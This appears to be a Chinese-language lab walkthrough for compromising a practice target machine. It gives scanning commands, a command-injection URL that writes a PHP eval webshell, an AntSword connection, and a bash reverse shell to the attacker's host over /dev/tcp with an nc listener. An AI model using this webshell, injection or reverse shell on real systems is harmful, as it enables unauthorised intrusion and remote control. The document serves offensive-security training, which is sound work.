1.进行配置,按住shift,在图一界面按e进去得到图二

.ro 替换为 rw signie init=/bin/bash
ctrl+x,ip a查看网卡信息,修改配置文件网卡信息

修改为如图所示内容后按shift+?然后输入wq点击回车退出,然后重启靶机

2.在kali中
arp-scan -l 扫描靶机ip

3.扫描端口信息
nmap -O 192.168.124.158

4.扫描目录信息
dirb http://192.168.124.158

5.访问靶机ip,点击site

6.进入如下页面,经过探索之后,点击buscar,发现页面的url可以传参

7.我们尝试输入一句话木马到1.php文件中
http://192.168.50.142/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > 1.php

8.我们访问当前目录下的1.php,发现上传成功
http://192.168.124.158/site/1.php

9.复制1.php文件的绝对路径,去蚁剑尝试连接
连接成功!

10.去kali中打开443的监听
nc -lvvp 443

11.在蚂蚁剑中打开终端,输入反弹shell
bash -c 'bash -i >& /dev/tcp/192.168.124.128/443 0>&1'

12.成功在kali中监听!
